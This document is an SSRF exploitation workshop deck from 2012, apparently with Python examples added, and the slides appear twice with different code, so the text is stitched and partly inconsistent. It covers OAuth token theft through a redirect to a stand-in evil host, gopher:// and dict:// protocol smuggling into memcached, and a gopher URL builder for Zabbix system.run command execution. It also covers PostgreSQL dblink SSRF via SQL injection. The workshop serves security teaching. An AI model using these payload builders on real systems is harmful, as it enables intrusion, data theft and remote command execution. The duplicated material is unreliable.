SSRF exploitation.
Workshop
Special for DefCon-UA
08/12/2012 Moscow, Neuron Hackspace
SSRF - Server Side Request Forgery
● The ability to make the vulnerable server issue
  requests to intranet/Internet hosts
● Using a protocol supported by the client's URI
  schemes, you can talk to services that speak
  other protocols (smuggling)
SSRF - Server Side Request Forgery
● What can I do with forged requests?
● Anything!
  ○ Get data from the internal network!
  ○ Exploit all host-based auth!
  ○ Exploit local services on the loopback
    interface!
  ○ etc...
SSRF - Server Side Request Forgery
[Diagram: the attacker's HTTP request passes the firewall to the frontend; the frontend makes an API request to the backend; the forged request from the backend reaches the loopback interface and the internal network (intranet).]
SSRF - reasons
● SSRF is not a single vulnerability
● SSRF is a class of attacks
● XXE, RFI, CRLF injection and others are SSRF's
  friends
● Anything that can open a socket can be
  SSRFed
SSRF - reasons
● Direct socket writes in the webapp
● HTTP clients (libcurl, LWP, Java's URL, etc)
● Database functions
● Format processing
  ○ XML parsers (XXE, DTD, XSD, XSLT, etc)
  ○ OpenOffice (DDE, dynamic data, etc)
  ○ PDF (tcpdf library, etc)
SSRF - what do you need?
● Desire
● Luck
● The ability to anticipate and assume
● nc as a listener (nc -l -vv -p 12345) to see
  what the server really sends
● The SSRF cheatsheet doc
SSRF - cheatsheet

● We collected all related information about
  SSRF and its exploitation in one
  cheatsheet:
https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit
HTTP client bugs
Bypass webapp filters (e.g. a preg_replace on the
URL) using a redirect: the filter checks only the
first URL, the client follows Location unchecked
● any host -> localhost
● valid port -> any port
● valid scheme -> any scheme
● The same-origin policy is enforced by browsers,
  not by HTTP clients
CASE #1. Market & Payment system.
OAuth token hijacking
● The application receives an OAuth token from the
  payment server
● The token is added to the HTTP request built by
  libcurl via CURLOPT_HTTPHEADER
● That header is appended to every request libcurl
  sends on the handle, even after redirects ;)
CASE #1. Market & Payment system.
OAuth token hijacking
● Find an open redirect vuln (WASC-38) on the
  payment server
● Change the payment URL to call the redirect instead
  of a valid payment transaction
● Grab the OAuth token the market uses against the
  payment system ;)
https://dev.onsec.ru/workshop/market/
CASE #1. Market & Payment system.
OAuth token hijacking
[Diagram: the market sends an HTTP request carrying the OAuth token to the payment system; the open redirect vuln there turns it into an SSRF attack, and the follow-up HTTP request, still carrying the market's OAuth token, lands on the evil host.]
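The two redirect problems above (filter bypass to loopback, and a handle-wide header that follows the redirect to a foreign host), as an added offline simulation that is not code from the workshop. The hosts, addresses, URLs, the token and the "network" table are constructed, and the vulnerable client models libcurl-style behaviour rather than calling libcurl; safe_fetch shows the checks a practitioner wants, namely re-validating every hop against the allow-list and the resolved address, and sending credential headers only to the host they were issued for.

```python
# Added example, not from the original slides: an offline simulation of the two
# HTTP-client redirect problems the deck describes. A regex filter admits only
# the payment host, but the client follows Location unchecked, so a redirect
# reaches loopback (filter bypass) and a header set once on the handle,
# CURLOPT_HTTPHEADER style, travels to the redirect target (token leak).
# Hosts, addresses, URLs and the token are constructed for the demo.
import ipaddress
import re
from urllib.parse import urlparse

# Constructed "network": URL -> (status, Location, body).
FAKE_NET = {
    "https://payment.example/pay": (200, None, "payment ok"),
    "https://payment.example/redirect?to=http://evil.example/collect":
        (302, "http://evil.example/collect", ""),
    "https://payment.example/redirect?to=http://127.0.0.1:11211/":
        (302, "http://127.0.0.1:11211/", ""),
    "http://evil.example/collect": (200, None, "thanks for the token"),
    "http://127.0.0.1:11211/": (200, None, "loopback service banner"),
}
# Constructed resolver so the check runs without DNS; public addresses are arbitrary.
FAKE_DNS = {"payment.example": "93.184.216.34", "evil.example": "104.16.0.7"}

# The webapp's pre-request filter, in the spirit of the deck's preg_replace:
# a regex on the URL string that only admits the payment host.
ALLOWED = re.compile(r"^https://payment\.example/")


def fake_send(url, headers):
    """One simulated HTTP request. Returns (status, location, body, headers_sent)."""
    status, location, body = FAKE_NET[url]
    return status, location, body, dict(headers)


def vulnerable_fetch(url, handle_headers, max_hops=5):
    """Filter once, then follow redirects blindly, re-sending the handle's
    headers on every hop (libcurl with CURLOPT_FOLLOWLOCATION, 2012 era)."""
    if not ALLOWED.match(url):
        raise ValueError("blocked by filter: " + url)
    trail = []
    for _ in range(max_hops):
        status, location, body, sent = fake_send(url, handle_headers)
        trail.append((url, sent))
        if status in (301, 302, 303, 307) and location:
            url = location
            continue
        return body, trail
    raise RuntimeError("too many redirects")


def resolves_to_internal(host, resolver=FAKE_DNS):
    """True if the host resolves to a non-global address (loopback, RFC 1918,
    link-local, reserved). Resolve first: the check must see the same address
    the socket will connect to."""
    ip = ipaddress.ip_address(resolver.get(host, host))
    return not ip.is_global


def safe_fetch(url, handle_headers, max_hops=5):
    """Validate scheme, allow-list and resolved address on every hop, and send
    the credential headers only to the host they were issued for."""
    origin_host = urlparse(url).hostname
    trail = []
    for _ in range(max_hops):
        parts = urlparse(url)
        if parts.scheme not in ("http", "https"):
            raise ValueError("scheme not allowed: " + url)
        if not ALLOWED.match(url) or resolves_to_internal(parts.hostname):
            raise ValueError("hop rejected: " + url)
        headers = handle_headers if parts.hostname == origin_host else {}
        status, location, body, sent = fake_send(url, headers)
        trail.append((url, sent))
        if status in (301, 302, 303, 307) and location:
            url = location
            continue
        return body, trail
    raise RuntimeError("too many redirects")
```

The simplest real-world fix is to not follow redirects at all (CURLOPT_FOLLOWLOCATION off) and handle a 3xx in the application, where the same allow-list and address check can be applied to the new URL before the next request.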
Let's go to server-side exploitation
● SSRF is really good for exploiting host-based auth
● Host-based auth must die ;)
● NoSQL databases, monitoring services and
  much more grant privileges to loopback
  connections by default
Protocol smuggling
● When you say "GET / HTTP/1.1", what does
  a service hear?
● When you receive data over one of the
  prehistoric protocols, what TCP packet do you
  send?
● When you say "bla[valid packet]bla", what does
  a service hear?
Protocols and URI schemes in HTTP
clients
● gopher:// lets you craft almost any
  TCP payload (no 0x00 for cURL, no bytes
  greater than 0x7f for Java)
● dict:// lets you forge the second line of a
  plain-text request (cURL only)
● ldap:// lets you forge a request with a
  constant prefix (LWP only)
What makes smuggling possible?
●   HTTP clients that don't check the protocol but
    send data immediately after connecting
    (ldap for LWP)
●   Services that do not close the socket after
    receiving an invalid packet
●   The protocol you can forge fits inside the
    protocol you want to exploit
CASE #2. Wordpress exploitation
● Yes, it is the latest WordPress (3.4.2) without
  any plugins
● Reason - libcurl unsafe redirect
● But the SSRF can be triggered only from the admin
  panel
● Use our old friend CSRF!
● CSRF + SSRF make you happy ;)
CASE #2. Wordpress exploitation
● No gopher:// protocol in Debian squeeze's
  cURL build
● But dict:// is available and lets us
  exploit memcached
● CSRF + SSRF = memcached exploit ;)
https://dev.onsec.ru/workshop/wordpress/
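The gopher:// smuggling mechanics from the "Protocol smuggling" slides and the memcached target of CASE #2, as one added example that is not code from the workshop: it builds the gopher URL that makes an HTTP client emit an arbitrary TCP payload, enforces the two client limits the slides name (no 0x00 for cURL, no bytes above 0x7f for Java), and replays the resulting byte stream through a toy memcached text-protocol server to show why a service that keeps the socket open after a bad line executes the valid commands buried in garbage. The memcached logic is a simplification (set/get/quit only) and the smuggled payload is constructed.

```python
# Added example, not from the original slides. gopher://host:port/_<payload>:
# the client drops the leading "/" and the item-type character ("_" here),
# percent-decodes the rest and writes it to the socket followed by CRLF. The
# memcached server below is a toy: it answers ERROR to unknown lines and keeps
# reading, which is the property that makes "bla[valid packet]bla" work.
from urllib.parse import quote


def check_client_limits(payload, client):
    """Raise if this client's gopher handling cannot carry the byte payload."""
    if client == "curl" and b"\x00" in payload:
        raise ValueError("cURL rejects a NUL byte in the gopher selector")
    if client == "java" and any(b > 0x7f for b in payload):
        raise ValueError("Java's URL client cannot carry bytes above 0x7f")


def gopher_url(host, port, payload, client="curl"):
    """Percent-encode the raw payload into a gopher selector."""
    check_client_limits(payload, client)
    return "gopher://%s:%d/_%s" % (host, port, quote(payload, safe=""))


def wire_bytes(payload):
    """What the gopher client actually writes to the socket."""
    return payload + b"\r\n"


def memcached_replay(stream):
    """Toy memcached text protocol. Returns (responses, store)."""
    store = {}
    responses = []
    lines = stream.split(b"\r\n")
    if lines and lines[-1] == b"":
        lines.pop()                       # trailing CRLF
    i = 0
    while i < len(lines):
        parts = lines[i].split()
        i += 1
        cmd = parts[0] if parts else b""
        if cmd == b"set" and len(parts) == 5:
            key, flags, nbytes = parts[1], parts[2], int(parts[4])
            data = lines[i] if i < len(lines) else b""   # data block follows
            i += 1
            if len(data) != nbytes:
                responses.append(b"CLIENT_ERROR bad data chunk")
                continue
            store[key] = (flags, data)
            responses.append(b"STORED")
        elif cmd == b"get" and len(parts) == 2:
            if parts[1] in store:
                flags, data = store[parts[1]]
                responses.append(b"VALUE %s %s %d" % (parts[1], flags, len(data)))
                responses.append(data)
            responses.append(b"END")
        elif cmd == b"quit":
            break
        else:
            responses.append(b"ERROR")    # real memcached does not hang up here
    return responses, store


# Constructed smuggled payload: a memcached set followed by a get.
SMUGGLED = b"set ssrf 0 0 7\r\nowned!!\r\nget ssrf"


def demo():
    url = gopher_url("127.0.0.1", 11211, SMUGGLED)
    # An HTTP request line and headers arriving first do no harm: memcached
    # answers ERROR to each of them and then executes the smuggled commands.
    prefix = b"GET / HTTP/1.1\r\nHost: x\r\n\r\n"
    responses, store = memcached_replay(prefix + wire_bytes(SMUGGLED))
    return url, responses, store
```

The same builder works for any line-oriented service on the target box; the NUL check is the reason a binary protocol such as the libpq startup packet cannot be smuggled through cURL's gopher handler.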
Format processors are SSRF friends
● On 23/03/2012 in Kyiv I talked about XXE-based
    SSRF
● XML parsers, DTD, XSD, XSLT - all of them
    provide SSRF
● OpenOffice provides SSRF
● Many processing libraries provide SSRF
●   Anything that can open a socket can be
    SSRFed
CASE #3. TCPDF library SSRF
● http://www.tcpdf.org/
● Very common library for PDF conversion
● Example application converts users' HTML to
  PDF
● What about external resources such as
  images?
● TCPDF fetches them using cURL
https://dev.onsec.ru/workshop/pdfconv/
CASE #4. LWP avatars uploader
● LWP - libwww-perl
● Useful and common library
● Follows redirects unsafely ;)
● Supports the gopher protocol by default ;)
● Let's go!!!
CASE #4. LWP avatars uploader
Zabbix agentd exploitation
● Zabbix is a common monitoring system
● Zabbix agentd - local daemon for various
  checks
● Host-based auth ;) (the agent answers passive
  checks only from the addresses in Server=,
  and the default config lists 127.0.0.1)
● Supports command execution ;) (system.run[]
  items, enabled by EnableRemoteCommands=1)
https://dev.onsec.ru/workshop/avatars/
CASE #5. Have a free time?
● Let's go: Postgres exploitation
● The dblink() function lets us do SSRF
  through SQLi
http://www.postgresql.org/docs/8.4/static/dblink.html
-- inner quotes doubled so the SQL literal is valid;
-- dblink connects to 127.0.0.1:11211 (memcached) and
-- sends a libpq startup packet before 'select 1'
SELECT dblink_send_query('host=127.0.0.1
dbname=quit user=''nstatsn'' port=11211
sslmode=disable','select 1');
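What actually leaves the database server when dblink() is pointed at host=127.0.0.1 port=11211, as an added example that is not code from the workshop: libpq writes either an SSLRequest (sslmode=prefer, the default) or a v3 StartupMessage (sslmode=disable) before any query, so that packet, not a memcached command, is what port 11211 receives. The conninfo parser is a simplification of libpq's syntax (no spaces inside quoted values), and the StartupMessage carries only user and database; real libpq adds parameters such as client_encoding.

```python
# Added example, not from the original slides: builds the first packet libpq
# sends for a dblink-style connection string. Wire format per the PostgreSQL
# frontend/backend protocol: StartupMessage = Int32 length (self-inclusive),
# Int32 protocol 3.0, NUL-terminated name/value pairs, final NUL.
# SSLRequest = Int32 8, Int32 80877103.
import struct

PROTOCOL_3_0 = 196608        # 3 << 16
SSL_REQUEST_CODE = 80877103  # (1234 << 16) | 5679


def parse_conninfo(conninfo):
    """key=value pairs separated by whitespace; values may be single-quoted.
    Simplified: libpq also allows spaces inside quoted values."""
    params = {}
    for token in conninfo.split():
        key, _, value = token.partition("=")
        params[key] = value.strip("'")
    return params


def startup_message(params):
    """conninfo 'dbname' is sent under the startup parameter name 'database'."""
    body = b""
    for name, key in (("user", "user"), ("database", "dbname")):
        if key in params:
            body += name.encode() + b"\x00" + params[key].encode() + b"\x00"
    body += b"\x00"
    return struct.pack("!ii", 8 + len(body), PROTOCOL_3_0) + body


def ssl_request():
    """8-byte SSLRequest; the server answers a single 'S' or 'N' byte."""
    return struct.pack("!ii", 8, SSL_REQUEST_CODE)


def first_packet(conninfo):
    """The first bytes libpq writes for this connection string."""
    params = parse_conninfo(conninfo)
    if params.get("sslmode", "prefer") == "disable":
        return startup_message(params)
    return ssl_request()


def demo():
    return first_packet("host=127.0.0.1 dbname=quit user=nstatsn "
                        "port=11211 sslmode=disable")
```

Two things follow from the bytes: the packet contains NUL bytes and no CRLF, so a line-oriented service such as memcached never sees a complete command in it, and it cannot be reproduced through cURL's gopher handler either; and without sslmode=disable the target receives the 8-byte SSLRequest instead, which is why the slide sets it explicitly. What you do get reliably from dblink is a connection attempt to an arbitrary host and port, i.e. internal port scanning through SQLi.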
Questions?
@ONsec_Lab
@d0znpp
d0znpp@onsec.ru
SSRF workshop

HTTP client bugs
● Bypass webapp filters (e.g. a preg_replace allowlist on the URL) using a redirect: the filter checks only the first URL, the HTTP client follows the 3xx
● any host -> localhost
● valid port -> any port
● valid schema -> any schema
● SOP is enforced by browsers, not by HTTP client libraries
CASE #1. Market & Payment system. OAuth token hijacking
● The application receives an OAuth token from the payment server
● The token is added to the HTTP request created by libcurl via CURLOPT_HTTPHEADER
● This header is appended to every request sent by libcurl, even after redirects ;)
CASE #1. Market & Payment system. OAuth token hijacking
● Find an open redirect vuln (WASC-38) at the payment server
● Change the payment URL to call the redirect instead of a valid payment transaction
● Hijack the OAuth token sent from the market to the payment system ;)
https://dev.onsec.ru/workshop/market/
CASE #1. Market & Payment system. OAuth token hijacking
(Diagram: the Market sends an HTTP request carrying the OAuth token to the Payment system; the open redirect there turns it into an SSRF, and libcurl re-sends the request, OAuth token included, to the Evil host.)
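The two failure modes above, a filter that inspects only the first URL and a libcurl CURLOPT_HTTPHEADER list that is replayed on every redirect hop, modelled in Python as an added example. This is not the workshop's code and it touches no network: the hostnames, addresses and 302 responses are constructed, and the redirect logic is a model of what a libcurl-style client does, not libcurl itself.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed DNS table and canned responses: this touches no network.
DNS = {
    "payment.example": "203.0.113.10",  # legitimate payment server (constructed)
    "evil.example": "198.51.100.7",     # attacker-controlled host (constructed)
    "localhost": "127.0.0.1",
}
# url -> (status, Location header or None)
RESPONSES = {
    "https://payment.example/pay?id=1": (200, None),
    "https://payment.example/old": (302, "https://payment.example/pay?id=1"),
    "https://payment.example/redirect?to=http://evil.example/": (302, "http://evil.example/"),
    "https://payment.example/redirect?to=http://localhost:11211/": (302, "http://localhost:11211/"),
    "http://evil.example/": (200, None),
    "http://localhost:11211/": (200, None),
}

ALLOWED_HOSTS = {"payment.example"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]


def naive_filter(url):
    """A preg_replace-style check: inspects the user-supplied URL once."""
    p = urlsplit(url)
    return p.scheme == "https" and p.hostname in ALLOWED_HOSTS


def hop_is_safe(url):
    """Re-validate scheme, host, port and the resolved address of one hop."""
    p = urlsplit(url)
    if p.scheme != "https" or p.hostname not in ALLOWED_HOSTS:
        return False
    if p.port not in (None, 443):
        return False
    addr = ipaddress.ip_address(DNS.get(p.hostname, "0.0.0.0"))
    return not any(addr in net for net in INTERNAL_NETS)


def follow(url, headers, check, strip_on_redirect, max_hops=5):
    """Model of a redirect-following HTTP client. Returns the (url, headers)
    pairs that went out. With strip_on_redirect=False the caller's headers
    ride along on every hop, which is what a libcurl CURLOPT_HTTPHEADER
    list does; `check` is applied to every hop before it is requested."""
    sent = []
    for _ in range(max_hops):
        if not check(url):
            raise ValueError("blocked: " + url)
        sent.append((url, dict(headers)))
        status, location = RESPONSES[url]
        if status not in (301, 302, 303, 307, 308) or location is None:
            return sent
        url = location
        if strip_on_redirect:
            headers = {}
    raise ValueError("too many redirects")


def vulnerable_fetch(url, token):
    """Filter once, then let the client go wherever the 302 points,
    OAuth token and all."""
    if not naive_filter(url):
        raise ValueError("blocked: " + url)
    return follow(url, {"Authorization": "Bearer " + token},
                  check=lambda u: True, strip_on_redirect=False)


def hardened_fetch(url, token):
    """Check every hop and never replay the credential to a redirect target."""
    return follow(url, {"Authorization": "Bearer " + token},
                  check=hop_is_safe, strip_on_redirect=True)


def is_blocked(fetch, url, token):
    """True if `fetch` refuses the request chain."""
    try:
        fetch(url, token)
    except ValueError:
        return True
    return False
```

The hardened variant still resolves the name itself and then lets the client connect, so in real code the address check has to be done on the socket the client actually opens (or the client has to be told the resolved address), otherwise a second DNS answer can still point the connection at the loopback interface.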
Let's go to server-side exploitation
● SSRF is really useful for exploiting host-based auth
● Host-based auth must die ;)
● NoSQL databases, monitoring services and much more grant privileges to loopback connections by default
Protocol smuggling
● When you say "GET / HTTP/1.1", what does the service hear?
● When you receive data by one of the prehistoric protocols, what TCP packet do you send?
● When you say "bla[valid packet]bla", what does the service hear?
Protocols and URI schemas in HTTP clients
● gopher:// lets you create almost any TCP packet (no 0x00 for cURL, no bytes greater than 0x7f for Java)
● dict:// lets you forge the second line of a plain-text request (cURL only)
● ldap:// lets you forge a request with a constant prefix (LWP only)
What makes smuggling possible?
● HTTP clients don't check the protocol but send data immediately after connect (ldap for LWP)
● Services do not close the socket after receiving an invalid packet
● The protocol you can forge fits inside the protocol you want to exploit
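The gopher:// trick from the slides above in Python, as an added example rather than code from the workshop: a builder that turns a raw TCP payload into a gopher URL while enforcing the two client limits the slide names, and a model of what the client then writes to the socket. The client behaviour modelled (drop the type character after the first slash, URL-decode the selector, append CRLF) is the standard gopher selector handling; the memcached payload and the loopback address are constructed.

```python
from urllib.parse import quote, unquote_to_bytes


def gopher_url(host, port, payload, client="curl"):
    """Wrap a raw TCP payload in a gopher:// URL. The gopher client drops
    the type character after the first '/' ('_' here, by convention),
    URL-decodes the rest of the selector and writes it to the socket
    followed by CRLF. The per-client limits are the ones from the slide."""
    if client == "curl" and b"\x00" in payload:
        raise ValueError("cURL will not send a NUL byte in a gopher selector")
    if client == "java" and any(b > 0x7f for b in payload):
        raise ValueError("Java's gopher handler cannot send bytes above 0x7f")
    return "gopher://%s:%d/_%s" % (host, port, quote(payload, safe=""))


def wire_bytes(url):
    """What the client writes to the socket for `url` (a model of the
    selector handling described above, not the real client)."""
    _, rest = url.split("://", 1)
    _, _, selector = rest.partition("/")
    return unquote_to_bytes(selector[1:]) + b"\r\n"


def rejected(host, port, payload, client):
    """True if the builder refuses the payload for that client."""
    try:
        gopher_url(host, port, payload, client)
    except ValueError:
        return True
    return False


# memcached text protocol, three commands smuggled in one selector:
# store a value, read it back, then close the connection cleanly.
# Constructed payload for a memcached on the loopback interface; the
# client's trailing CRLF terminates the final "quit" line for free.
MEMCACHED_PAYLOAD = b"set ssrf 0 0 5\r\nhello\r\nget ssrf\r\nquit"
```

Because the service sees only the decoded selector plus CRLF, the payload's line structure is entirely under your control; the only things you cannot put on the wire are the bytes the particular client refuses to encode, which is why the slide lists those limits per client.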
CASE #2. WordPress exploitation
● Yes, it is the latest WordPress (3.4.2) without any plugins
● Reason: libcurl unsafe redirect
● But the SSRF can be triggered only from the admin panel
● Use our old friend CSRF!
● CSRF + SSRF make you happy ;)
CASE #2. WordPress exploitation
● No gopher:// protocol in Debian squeeze's cURL
● But dict:// is available and lets us exploit memcached
● CSRF + SSRF = memcached exploit ;)
https://dev.onsec.ru/workshop/wordpress/
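How dict:// reaches memcached when gopher:// is unavailable, as an added Python example (not the workshop's exploit): cURL's DICT handler sends its CLIENT banner, then the URL path as a second line with ':' turned into ' ', then QUIT, so one forged line fits between two lines memcached simply answers with ERROR. The banner text is modelled after cURL's lib/dict.c and the version string is an assumed value; the memcached reader is a tiny model covering only the commands used here.

```python
def dict_url(host, port, line):
    """Put one forged protocol line into a dict:// URL. cURL sends the URL
    path as the second line of its DICT conversation, replacing ':' with
    ' ', so spaces in the forged line are written as ':'."""
    return "dict://%s:%d/%s" % (host, port, line.replace(" ", ":"))


def dict_wire(url, curl_version="7.21.0"):
    """Model of the three lines cURL writes for a dict:// URL whose path is
    not a d:/m: lookup: its CLIENT banner, the forged line, then QUIT.
    (curl_version is an assumed value for the banner.)"""
    _, rest = url.split("://", 1)
    _, _, path = rest.partition("/")
    forged = path.replace(":", " ")
    return ("CLIENT libcurl %s\r\n%s\r\nQUIT\r\n" % (curl_version, forged)).encode()


def memcached_responses(stream):
    """Tiny model of memcached's text protocol reader: one command per
    line, lower-case command names, an unknown command gets ERROR and the
    connection stays open (slide 16's second condition), and only a
    lower-case quit closes it. Covers only the commands this example needs."""
    out = []
    for line in stream.split(b"\r\n"):
        if not line:
            continue
        cmd = line.split(b" ")[0]
        if cmd == b"flush_all":
            out.append(b"OK")
        elif cmd == b"stats":
            out.append(b"STAT ... END")  # the real reply is many STAT lines
        elif cmd == b"quit":
            break
        else:
            out.append(b"ERROR")
    return out
```

Only one line is under your control, so commands that need a data block on a following line (set, add) do not fit this way; flush_all, stats and delete do, which is enough to wipe or fingerprint a cache behind the WordPress admin's SSRF.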
Format processors are SSRF friends
● 23/03/2012 in Kyiv I talked about XXE-based SSRF
● XML parsers, DTD, XSD, XSLT: all of them provide SSRF
● OpenOffice provides SSRF
● Many processing libraries provide SSRF
● Anything that can open a socket can be SSRFed
CASE #3. TCPDF library SSRF
● http://www.tcpdf.org/
● Very common library for PDF conversion
● Example application converts user HTML to PDF
● What about external resources such as images?
● TCPDF uses cURL
https://dev.onsec.ru/workshop/pdfconv/
CASE #4. LWP avatars uploader
● LWP: libwww-perl
● Useful and common library
● Provides unsafe redirect ;)
● Supports the gopher protocol by default ;)
● Let's go!!!
CASE #4. LWP avatars uploader. Zabbix agentd exploitation
● Zabbix is a common monitoring system
● Zabbix agentd: local daemon for various checks
● Host-based auth ;)
● Supports command execution ;)
https://dev.onsec.ru/workshop/avatars/
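The agent side of CASE #4 as an added Python example, not the workshop's code: the passive-check request that a gopher:// URL can carry through LWP to zabbix_agentd on port 10050, and a parser for the ZBXD frame the agent answers with. Assumptions: the agent accepts the legacy plaintext "key\n" request and tolerates the CR the gopher client appends, the SSRF host is in the agent's Server= allowlist (that is the host-based auth the slide refers to), remote commands are enabled (EnableRemoteCommands), and the reply bytes are constructed.

```python
import struct
from urllib.parse import quote

ZBX_HEADER = b"ZBXD\x01"
ZABBIX_AGENT_PORT = 10050


def zabbix_request(key):
    """Legacy plaintext passive check: the item key terminated by a newline.
    system.run[...] executes a shell command on the agent host when the
    agent allows remote commands (EnableRemoteCommands=1)."""
    return key.encode() + b"\n"


def zabbix_gopher_url(host, key, port=ZABBIX_AGENT_PORT):
    """The same request carried in a gopher:// URL for a client such as LWP;
    the client appends CRLF, which serves as the newline (assumption: the
    agent tolerates the extra CR)."""
    return "gopher://%s:%d/_%s" % (host, port, quote(key, safe=""))


def zabbix_frame(payload):
    """Frame a reply as the agent does: 'ZBXD', version 0x01, 8-byte
    little-endian length, payload. Used here to build a constructed reply."""
    return ZBX_HEADER + struct.pack("<Q", len(payload)) + payload


def parse_zabbix_reply(data):
    """Parse an agent reply, rejecting non-ZBXD and truncated frames."""
    if not data.startswith(ZBX_HEADER):
        raise ValueError("not a ZBXD frame")
    if len(data) < 13:
        raise ValueError("truncated header")
    (length,) = struct.unpack("<Q", data[5:13])
    payload = data[13:13 + length]
    if len(payload) != length:
        raise ValueError("truncated payload: want %d, have %d" % (length, len(payload)))
    return payload


def is_valid_frame(data):
    """True if `data` parses as a complete ZBXD frame."""
    try:
        parse_zabbix_reply(data)
    except ValueError:
        return False
    return True


def command_succeeded(payload):
    """The agent answers an unknown or forbidden key with ZBX_NOTSUPPORTED
    inside a normal frame, so check the payload, not just the framing."""
    return not payload.startswith(b"ZBX_NOTSUPPORTED")


# Constructed reply for a system.run[id] check on an agent running as root.
SAMPLE_REPLY = zabbix_frame(b"uid=0(root) gid=0(root) groups=0(root)")
```

The reply only comes back to the SSRF client, so whether you see it depends on the vulnerable application echoing the fetched body; the command runs either way, which is why a blind system.run[...] that calls back to your nc listener is the usual first probe.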
CASE #5. Have some free time?
● Let's go for Postgres exploitation
● The dblink() function lets us do SSRF through SQLi
http://www.postgresql.org/docs/8.4/static/dblink.html
SELECT dblink_send_query('host=127.0.0.1 dbname=quit user=nstatsn port=11211 sslmode=disable','select 1');
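What that conninfo makes libpq write to 127.0.0.1:11211, modelled in Python as an added example (not the workshop's code and not a libpq call): host and port only choose the target, sslmode=disable removes the 8-byte SSLRequest prelude, and everything the remote service actually reads is the protocol 3.0 StartupMessage built from user and dbname. The message layout is the PostgreSQL frontend/backend protocol; the parameter set is reduced to user and database (a real libpq may add more, depending on version and environment), and values with spaces or quotes are out of scope.

```python
import struct

PG_PROTOCOL_3_0 = 196608          # 3 << 16
SSL_REQUEST_CODE = 80877103       # (1234 << 16) | 5679


def parse_conninfo(conninfo):
    """keyword=value pairs separated by whitespace, as in the dblink call
    (values containing spaces or quotes are out of scope here)."""
    return dict(token.split("=", 1) for token in conninfo.split())


def startup_message(user, database):
    """Protocol 3.0 StartupMessage: int32 length (including itself),
    int32 protocol version, NUL-terminated key/value pairs, final NUL."""
    body = struct.pack("!I", PG_PROTOCOL_3_0)
    for key, value in (("user", user), ("database", database)):
        body += key.encode() + b"\x00" + value.encode() + b"\x00"
    body += b"\x00"
    return struct.pack("!I", len(body) + 4) + body


def ssl_request():
    """8-byte SSLRequest that libpq sends first unless sslmode=disable."""
    return struct.pack("!II", 8, SSL_REQUEST_CODE)


def dblink_wire(conninfo):
    """The packets, in order, that a libpq connection for `conninfo` writes
    to host:port. host and port select the target and never appear in the
    packets; sslmode only decides whether the SSLRequest prelude is sent.
    Model: user and database only (real libpq may add more parameters);
    database defaults to the user name as in libpq."""
    p = parse_conninfo(conninfo)
    packets = []
    if p.get("sslmode", "prefer") != "disable":
        packets.append(ssl_request())
    user = p.get("user", "")
    packets.append(startup_message(user, p.get("dbname", user)))
    return packets


def target(conninfo):
    """(host, port) the forged connection goes to."""
    p = parse_conninfo(conninfo)
    return p.get("host", "localhost"), int(p.get("port", "5432"))
```

Note that the startup packet contains no newline, so a line-oriented text service on the target port has nothing to act on and the forged connection mostly yields timing and error-message differences rather than a reply; the user and dbname values are the only bytes you control inside it.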